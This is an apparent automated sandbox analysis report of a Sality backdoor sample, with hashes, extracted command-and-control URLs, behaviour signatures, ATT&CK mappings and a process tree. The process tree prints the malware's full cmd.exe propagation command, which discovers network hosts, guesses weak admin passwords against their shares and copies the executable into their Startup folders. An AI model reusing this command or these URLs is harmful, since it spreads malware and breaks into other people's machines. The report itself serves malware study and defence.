Analysis
-
max time kernel
35s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
24-12-2024 13:02
General
-
Target
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
-
Size
2.3MB
-
MD5
921379bd587ab29da4dc23fb9d47fe36
-
SHA1
e9db1731731503a81a2fdc67ffa005e6aa2a8038
-
SHA256
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
-
SHA512
90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
-
SSDEEP
49152:dtSuw/yQBQIlFZ4n5gcdRVGTZYf0hrSkW6OoXWr0u3r8t9V808b:hnID2n5pViC8hrRW9X78tjIb
Malware Config
Extracted
sality
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
http://www.klkjwre9fqwieluoi.info/
http://kukutrustnet777888.info/
Signatures
-
Modifies firewall policy service 3 TTPs 6 IoCs
-
Sality
Sality is backdoor written in C++, first discovered in 2003.
-
Sality family
-
UAC bypass 3 TTPs 2 IoCs
-
Windows security bypass 2 TTPs 12 IoCs
-
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Windows security modification 2 TTPs 14 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Network Service Discovery 1 TTPs 2 IoCs
Attempt to gather information on host's network.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
UPX packed file 38 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
NSIS installer 4 IoCs
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 48 IoCs
-
System policy modification 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"2⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Deletes itself
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))4⤵
- Indicator Removal: Network Share Connection Removal
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"5⤵
- Network Service Discovery
-
C:\Windows\SysWOW64\net.exenet view6⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"6⤵
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a6⤵
- Network Service Discovery
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "5⤵
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.16⤵
- Discovers systems in the same network
-
-
C:\Windows\SysWOW64\find.exefind /i " "6⤵
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Indicator Removal
1Network Share Connection Removal
1Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD52915b3f8b703eb744fc54c81f4a9c67f
SHA1e10361a11f8a7f232ac3cb2125c1875a0a69a3e4
SHA2569f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
SHA51284e53163c255edde6a0f2289b67166ad8c4f3e2b06e92b7d9dd3d8701a58b4c6f6c661be0c9f0777677bcd36de0a7cccc6512d953c4ba12d8b5c6a35617f3816
-
Filesize
1KB
MD523c2dce8ae3f59a7bb93cb25f32b68df
SHA15a415e7b7309b7195977ea3277d712641129a2f7
SHA256a4258cde2a37e3d68440bc2613fa8151eda7769c1a1e0f0cd5e2967f5cd4d187
SHA512c1da2f2d4aee9fdc1f5a4d3cd793784102a8380fc0db4c15474a03f849eecfb1e491ddfa37074d59ebdfc3117b7c3e6585fd8747e85ae547eeef62ec8c689ca9
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
2.3MB
MD5921379bd587ab29da4dc23fb9d47fe36
SHA1e9db1731731503a81a2fdc67ffa005e6aa2a8038
SHA25650cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
SHA51290211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
-
Filesize
257B
MD53480d14e211f8df14470452e243b6fd6
SHA15a48c27530713c3355c9282fa248e2fb707ca8ea
SHA256663f6e40cb6f1ac462c8ceb65d088f2b91021124e5dc6806975d48c89a31d74a
SHA512add0f9f080534332c54e903f751399d8358fdd61fdbd7e5f63795f90404f9e249f7477447240f801844d3b12fdfe3fa5cb721300d5af2f6f0f4752764cff2b1c
-
Filesize
100KB
MD5876352601347415b257562c1a1814747
SHA17a2efaec1f5cd7237cf7337b85bb93b7aa61fd11
SHA2564433ac7f3fd183495db06275d4885fd8e1462fe542fcc2c9681e95d3e7ceddde
SHA51206c798212aeb0d300701bb792bb71e0d921629995a4de500605cf879a9c93c6b77a2663b4795b846676a354c1eddc23bc341723080cfdaca1c35b3d7c47616a2
-
Filesize
16.6MB
-
Filesize
4KB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
8KB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
8KB
-
Filesize
16.6MB
-
Filesize
8KB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
716KB
-
Filesize
716KB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
8KB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
8KB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
8KB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
16.6MB
-
Filesize
4KB
-
Filesize
716KB